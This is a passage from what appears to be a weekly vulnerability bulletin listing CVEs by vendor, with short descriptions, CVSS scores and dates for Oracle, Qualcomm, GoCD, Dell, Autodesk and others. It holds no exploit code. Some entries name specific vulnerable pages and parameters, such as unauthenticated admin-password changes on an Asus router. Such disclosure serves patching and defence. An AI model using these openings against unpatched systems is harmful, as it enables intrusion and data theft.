oracle — solaris Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 5.5 CVE-2022-39401
MISC
oracle — solaris Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystem). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 5.5 CVE-2022-39417
MISC
oracle — transportation_management Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: UI Infrastructure). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Transportation Management accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Transportation Management. CVSS 3.1 Base Score 5.4 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L). 2022-10-18 5.4 CVE-2022-21591
MISC
oracle — transportation_management Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: Data, Functional Security). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Transportation Management accessible data as well as unauthorized read access to a subset of Oracle Transportation Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N). 2022-10-18 5.4 CVE-2022-39420
MISC
oracle — transportation_management Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: Business Process Automation). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Transportation Management accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N). 2022-10-18 4.9 CVE-2022-39411
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 6.0 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H). 2022-10-18 6 CVE-2022-21621
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.38. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). 2022-10-18 6 CVE-2022-39423
MISC
oracle — vm_virtualbox Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2022-10-18 4.4 CVE-2022-21627
MISC
oracle — weblogic_server Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle WebLogic Server executes to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 5.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H). 2022-10-18 5.2 CVE-2022-21616
MISC
oroinc — orocommerce OroCommerce is an open-source Business to Business Commerce application. Versions between 4.1.0 and 4.1.17 inclusive, 4.2.0 and 4.2.11 inclusive, and between 5.0.0 and 5.0.3 inclusive, are vulnerable to Cross-site Scripting in the UPS Surcharge field of the Shipping rule edit page. The attacker needs permission to create or edit a shipping rule. This issue has been patched in version 5.0.6. There are no known workarounds. 2022-10-18 5.4 CVE-2022-31037
CONFIRM
otrs — otrs An external attacker is able to send a specially crafted email (with many recipients) and trigger a potential DoS of the system 2022-10-17 6.5 CVE-2022-39052
CONFIRM
passster_project — passster The Passster WordPress plugin before 3.5.5.5.2 stores the password inside a cookie named “passster” using base64 encoding method which is easy to decode. This puts the password at risk in case the cookies get leaked. 2022-10-17 5.9 CVE-2022-3206
MISC
pivotal — reactor_netty Reactor Netty HTTP Server, in versions 1.0.11 – 1.0.23, may log request headers in some cases of invalid HTTP requests. The logged headers may reveal valid access tokens to those with access to server logs. This may affect only invalid HTTP requests where logging at WARN level is enabled. 2022-10-19 4.3 CVE-2022-31684
MISC
qemu — qemu An integer underflow issue was found in the QEMU VNC server while processing ClientCutText messages in the extended format. A malicious client could use this flaw to make QEMU unresponsive by sending a specially crafted payload message, resulting in a denial of service. 2022-10-17 6.5 CVE-2022-3165
MISC
qualcomm — apq8009_firmware Information disclosure due to exposure of information while GPU reads the data in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables 2022-10-19 5.5 CVE-2022-25664
CONFIRM
qualcomm — apq8096au_firmware Memory corruption due to use after free in service while trying to access maps by different threads in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking 2022-10-19 6.7 CVE-2022-25666
CONFIRM
qualcomm — aqt1000_firmware Possible buffer overflow due to lack of buffer length check during management frame Rx handling leads to denial of service in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity 2022-10-19 5.5 CVE-2022-25663
CONFIRM
qualcomm — aqt1000_firmware Denial of service in BOOT when partition size for a particular partition is requested due to integer overflow when blocks are calculated in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables 2022-10-19 4.6 CVE-2022-22078
CONFIRM
redhat — enterprise_linux A flaw was found in 389-ds-base. When the Content Synchronization plugin is enabled, an authenticated user can reach a NULL pointer dereference using a specially crafted query. This flaw allows an authenticated attacker to cause a denial of service. This CVE is assigned against an incomplete fix of CVE-2021-3514. 2022-10-14 6.5 CVE-2022-2850
MISC
MISC
redhat — openshift In Red Hat Openshift 1, weak default permissions are applied to the /etc/openshift/server_priv.pem file on the broker server, which could allow users with local access to the broker to read this file. 2022-10-19 5.5 CVE-2013-4281
MISC
MISC
redhat — virtualization A flaw was found in ovirt-engine, which leads to the logging of plaintext passwords in the log file when using otapi-style. This flaw allows an attacker with sufficient privileges to read the log file, leading to confidentiality loss. 2022-10-19 6.5 CVE-2022-2805
MISC
MISC
ree6 — ree6 Ree6 is a moderation bot. This vulnerability would allow other server owners to create configurations such as “Better-Audit-Logging” which contain a channel from another server as a target. This would mean you could send log messages to another Guild channel and bypass raid and webhook protections. A specifically crafted log message could allow spamming and mass advertisements. This issue has been patched in version 1.9.9. There are currently no known workarounds. 2022-10-14 5.4 CVE-2022-39302
CONFIRM
MISC
related_posts_for_wordpress_project — related_posts_for_wordpress Cross-site Scripting (XSS) – Stored in GitHub repository barrykooij/related-posts-for-wp prior to 2.1.3. 2022-10-14 5.4 CVE-2022-3506
CONFIRM
MISC
relatedcode — messenger Relatedcode’s Messenger version 7bcd20b allows an authenticated external attacker to access sensitive data of any user of the application. This is possible because the application exposes user data to the public. 2022-10-19 6.5 CVE-2022-41707
MISC
MISC
relatedcode — messenger Relatedcode’s Messenger version 7bcd20b allows an authenticated external attacker to access existing chats in the workspaces of any user of the application. This is possible because the application does not validate permissions correctly. 2022-10-19 4.3 CVE-2022-41708
MISC
MISC
rukovoditel — rukovoditel A stored cross-site scripting (XSS) vulnerability in the Configuration/Holidays module of Rukovoditel v3.2.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter. 2022-10-19 5.4 CVE-2022-43185
MISC
sanitization_management_system_project — sanitization_management_system A vulnerability classified as problematic has been found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the component User Creation Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-211014 is the identifier assigned to this vulnerability. 2022-10-15 6.1 CVE-2022-3518
MISC
sanitization_management_system_project — sanitization_management_system A vulnerability classified as problematic was found in SourceCodester Sanitization Management System 1.0. Affected by this vulnerability is an unknown functionality of the component Quote Requests Tab. The manipulation of the argument Manage Remarks leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-211015. 2022-10-15 6.1 CVE-2022-3519
MISC
sanitization_management_system_project — sanitization_management_system A vulnerability was found in SourceCodester Sanitization Management System. It has been classified as problematic. Affected is an unknown function of the file /php-sms/admin/. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210840. 2022-10-14 5.4 CVE-2022-3505
N/A
N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component My Account. The manipulation of the argument First Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211201 was assigned to this vulnerability. 2022-10-18 5.4 CVE-2022-3587
N/A
N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /csms/admin/?page=user/list of the component Create User Handler. The manipulation of the argument First Name/Last Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-211046 is the identifier assigned to this vulnerability. 2022-10-17 4.8 CVE-2022-3546
N/A
N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /csms/admin/?page=system_info of the component Setting Handler. The manipulation of the argument System Name/System Short Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-211047. 2022-10-17 4.8 CVE-2022-3547
N/A
N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the component Add New Storage Handler. The manipulation of the argument Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-211048. 2022-10-17 4.8 CVE-2022-3548
N/A
N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system A vulnerability classified as problematic has been found in SourceCodester Simple Cold Storage Management System 1.0. Affected is an unknown function of the file /csms/?page=contact_us of the component Contact Us. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-211194 is the identifier assigned to this vulnerability. 2022-10-18 4.3 CVE-2022-3585
MISC
MISC
simple_exam_reviewer_management_system_project — simple_exam_reviewer_management_system In Simple Exam Reviewer Management System v1.0 the User List function has improper access control that allows low privileged users to modify user permissions to higher privileges. 2022-10-20 6.5 CVE-2022-42197
MISC
MISC
simple_exam_reviewer_management_system_project — simple_exam_reviewer_management_system Simple Exam Reviewer Management System v1.0 is vulnerable to Stored Cross Site Scripting (XSS) via the Exam List. 2022-10-20 5.4 CVE-2022-42200
MISC
MISC
smackcoders — an_ultimate_wordpress_importer_cum_migration_as_csv_&_xml The Import all XML, CSV & TXT WordPress plugin before 6.5.8 does not have authorisation in some places, which could allow any authenticated users to access some of the plugin features if they manage to get the related nonce 2022-10-17 4.2 CVE-2022-3244
MISC
solarwinds — orion_platform Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3 and previous. 2022-10-20 5.4 CVE-2022-36966
CONFIRM
CONFIRM
solarwinds — sql_sentry Sensitive information could be displayed when a detailed technical error message is posted. This information could disclose environmental details. 2022-10-19 5.3 CVE-2022-38107
MISC
MISC
sonos — one_firmware Some versions of Sonos One (1st and 2nd generation) allow partial or full memory access via attacker controlled hardware that can be attached to the Mini-PCI Express slot on the motherboard that hosts the WiFi card on the device. 2022-10-20 6.8 CVE-2020-9285
MISC
sra-admin_project — sra-admin sra-admin is a background rights management system that separates the front and back end. sra-admin version 1.1.1 has a storage cross-site scripting (XSS) vulnerability. After logging into the sra-admin background, an attacker can upload an html page containing xss attack code in “Personal Center” – “Profile Picture Upload” allowing theft of the user’s personal information. This issue has been patched in 1.1.2. There are no known workarounds. 2022-10-19 5.4 CVE-2022-39301
CONFIRM
tenable — nessus Insufficiently Protected Credentials: An authenticated user with debug privileges can retrieve stored Nessus policy credentials from the “nessusd” process in cleartext via process dumping. The affected products are all versions of Nessus Essentials and Professional. The vulnerability allows an attacker to access credentials stored in Nessus scanners, potentially compromising its customers’ network of assets. 2022-10-17 6.5 CVE-2022-28291
MISC
themeum — tutor_lms The Tutor LMS WordPress plugin before 2.0.10 does not escape some course parameters, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2022-10-17 4.8 CVE-2022-2563
MISC
thoughtworks — gocd GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 leak the symmetric key used to encrypt/decrypt any secure variables/secrets in GoCD configuration to authenticated agents. A malicious/compromised agent may then expose that key from memory, and potentially allow an attacker the ability to decrypt secrets intended for other agents/environments if they also are able to obtain access to encrypted configuration values from the GoCD server. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds. 2022-10-14 6.5 CVE-2022-39309
MISC
MISC
CONFIRM
MISC
thoughtworks — gocd GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 can allow one authenticated agent to impersonate another agent, and thus receive work packages for other agents due to broken access control and incorrect validation of agent tokens within the GoCD server. Since work packages can contain sensitive information such as credentials intended only for a given job running against a specific agent environment, this can cause accidental information disclosure. Exploitation requires knowledge of agent identifiers and ability to authenticate as an existing agent with the GoCD server. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds. 2022-10-14 6.5 CVE-2022-39310
MISC
MISC
CONFIRM
thoughtworks — gocd GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions from 19.2.0 to 19.10.0 (inclusive) are subject to a timing attack in validation of access tokens due to use of regular string comparison for validation of the token rather than a constant time algorithm. This could allow a brute force attack on GoCD server API calls to observe timing differences in validations in order to guess an access token generated by a user for API access. This issue is fixed in GoCD version 19.11.0. As a workaround, users can apply rate limiting or insert random delays to API calls made to GoCD Server via a reverse proxy or other fronting web server. As another workaround, users may disallow use of access tokens by having an administrator revoke all access tokens through the “Access Token Management” admin function. 2022-10-14 5.9 CVE-2022-39308
MISC
MISC
MISC
CONFIRM
tp-link — ax10_firmware The web app client of TP-Link AX10v1 V1_211117 uses hard-coded cryptographic keys when communicating with the router. Attackers who are able to intercept the communications between the web client and router through a man-in-the-middle attack can then obtain the sequence key via a brute-force attack, and access sensitive information. 2022-10-18 5.9 CVE-2022-41540
MISC
MISC
tp-link — tl-wr841n_firmware TP-Link TL-WR841N 8.0 4.17.16 Build 120201 Rel.54750n is vulnerable to Cross Site Scripting (XSS). 2022-10-18 6.1 CVE-2022-42202
MISC
wolfssl — wolfssl An issue was discovered in wolfSSL before 5.5.0. A fault injection attack on RAM via Rowhammer leads to ECDSA key disclosure. Users performing signing operations with private ECC keys, such as in server-side TLS connections, might leak faulty ECC signatures. These signatures can be processed via an advanced technique for ECDSA key recovery. (In 5.5.0 and later, WOLFSSL_CHECK_SIG_FAULTS can be used to address the vulnerability.) 2022-10-15 5.3 CVE-2022-42961
MISC
wp_custom_cursors_project — wp_custom_cursors The WP Custom Cursors WordPress plugin before 3.0.1 does not have CSRF check in place when creating and editing cursors, which could allow attackers to make a logged in admin perform such actions via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping in some of the cursor options, it could also lead to Stored Cross-Site Scripting 2022-10-17 6.1 CVE-2022-3149
CONFIRM
wp_custom_cursors_project — wp_custom_cursors The WP Custom Cursors WordPress plugin before 3.0.1 does not have CSRF check in place when deleting cursors, which could allow attackers to make a logged in admin delete arbitrary cursors via a CSRF attack. 2022-10-17 4.3 CVE-2022-3151
CONFIRM
zoom — zoom_on-premise_meeting_connector_mmr Zoom On-Premise Meeting Connector MMR before version 4.8.20220815.130 contains an improper access control vulnerability. As a result, a malicious actor could obtain the audio and video feed of a meeting they were not authorized to join and cause other meeting disruptions. 2022-10-14 6.5 CVE-2022-28760
MISC
zoom — zoom_on-premise_meeting_connector_mmr Zoom On-Premise Meeting Connector MMR before version 4.8.20220916.131 contains an improper access control vulnerability. As a result, a malicious actor in a meeting or webinar they are authorized to join could prevent participants from receiving audio and video causing meeting disruptions. 2022-10-14 6.5 CVE-2022-28761
MISC


Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
linux — linux_kernel A vulnerability classified as problematic was found in Linux Kernel. Affected by this vulnerability is the function mvpp2_dbgfs_port_init of the file drivers/net/ethernet/marvell/mvpp2/mvpp2_debugfs.c of the component mvpp2. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier VDB-211033 was assigned to this vulnerability. 2022-10-17 3.5 CVE-2022-3535
N/A
N/A
linux — linux_kernel A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function kcm_tx_work of the file net/kcm/kcmsock.c of the component kcm. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. VDB-211018 is the identifier assigned to this vulnerability. 2022-10-16 2.5 CVE-2022-3521
MISC
MISC
oracle — graalvm Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). 2022-10-18 3.7 CVE-2022-21619
MISC
oracle — graalvm Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). 2022-10-18 3.7 CVE-2022-21624
MISC
oracle — graalvm Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). 2022-10-18 3.7 CVE-2022-39399
MISC
oracle — mysql Vulnerability in the MySQL Shell product of Oracle MySQL (component: Shell: Core Client). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Shell executes to compromise MySQL Shell. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Shell accessible data as well as unauthorized read access to a subset of MySQL Shell accessible data. CVSS 3.1 Base Score 3.9 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N). 2022-10-18 3.9 CVE-2022-39403
MISC
oracle — solaris Vulnerability in the Oracle Solaris product of Oracle Systems (component: LDoms). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Solaris accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Solaris. CVSS 3.1 Base Score 3.3 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:L). 2022-10-18 3.3 CVE-2022-21610
MISC
oracle — transportation_management Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: Business Process Automation). Supported versions that are affected are 6.4.3 and 6.5.1. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Transportation Management. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L). 2022-10-18 2.7 CVE-2022-39409
MISC
redhat — openshift An input validation vulnerability exists in Openshift Enterprise due to a 1:1 mapping of tenants in Hawkular Metrics and projects/namespaces in OpenShift. If a user creates a project called “MyProject” and then later deletes it, another user can then create a project called “MyProject” and access the metrics stored from the original “MyProject” instance. 2022-10-17 3.5 CVE-2017-7517
MISC
MISC
simple_cold_storage_management_system_project — simple_cold_storage_management_system A vulnerability has been found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument change password leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211189 was assigned to this vulnerability. 2022-10-18 3.5 CVE-2022-3582
MISC
MISC


Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
asus — rt-n12e Asus RT-N12E 2.0.0.39 is affected by an incorrect access control vulnerability. Through system.asp / start_apply.htm, an attacker can change the administrator password without any authentication. 2022-10-19 not yet calculated CVE-2020-23648
MISC
MISC
MISC
autodesk — autocad A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 not yet calculated CVE-2022-41309
MISC
autodesk — autocad A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 not yet calculated CVE-2022-41310
MISC
autodesk — autocad A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 not yet calculated CVE-2022-42933
MISC
autodesk — autocad A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 not yet calculated CVE-2022-42934
MISC
autodesk — autocad A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 not yet calculated CVE-2022-42935
MISC
autodesk — autocad A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by read access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 not yet calculated CVE-2022-42943
MISC
autodesk — autocad A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by read access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 not yet calculated CVE-2022-42944
MISC
automox — automox_agent The Automox Agent before 40 on Windows incorrectly sets permissions on key files. 2022-10-21 not yet calculated CVE-2022-36122
MISC
MISC
bento4 — bento4 Bento4 1.6.0 has memory leaks via the mp4fragment. 2022-10-19 not yet calculated CVE-2022-40884
MISC
MISC
bento4 — bento4 Bento4 v1.6.0-639 has a memory allocation issue that can cause denial of service. 2022-10-19 not yet calculated CVE-2022-40885
MISC
MISC
dell — isilon_onefs The Dell Isilon OneFS versions 8.2.2 and earlier SSHD process improperly allows Transmission Control Protocol (TCP) and stream forwarding. This provides the remotesupport user and users with restricted shells more access than is intended. 2022-10-21 not yet calculated CVE-2020-5355
CONFIRM
dell — powerscale_onefs Dell PowerScale OneFS, versions 8.2.2-9.3.0, contain an OS command injection vulnerability. A privileged local malicious user could potentially exploit this vulnerability, leading to a full system compromise. This impacts compliance mode clusters. 2022-10-21 not yet calculated CVE-2022-34437
CONFIRM
dell — powerscale_onefs Dell PowerScale OneFS, versions 8.2.x-9.4.0.x, contain a privilege context switching error. A local authenticated malicious user with high privileges could potentially exploit this vulnerability, leading to full system compromise. This impacts compliance mode clusters. 2022-10-21 not yet calculated CVE-2022-34438
CONFIRM
dell — powerscale_onefs Dell PowerScale OneFS, versions 8.2.0.x-9.4.0.x, contain an Allocation of Resources Without Limits or Throttling vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service and performance issues on that node. 2022-10-21 not yet calculated CVE-2022-34439
CONFIRM
dell — powerscale_onefs Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.19, 9.2.1.12, and 9.3.0.6, contain a sensitive data in log files vulnerability. A privileged local user may potentially exploit this vulnerability, leading to disclosure of this sensitive data. 2022-10-21 not yet calculated CVE-2022-31239
CONFIRM
dell — powerstore Dell PowerStore versions 2.1.0.x contain an Authentication bypass vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability under specific configuration. An attacker would gain unauthorized access upon successful exploit. 2022-10-21 not yet calculated CVE-2022-26870
CONFIRM
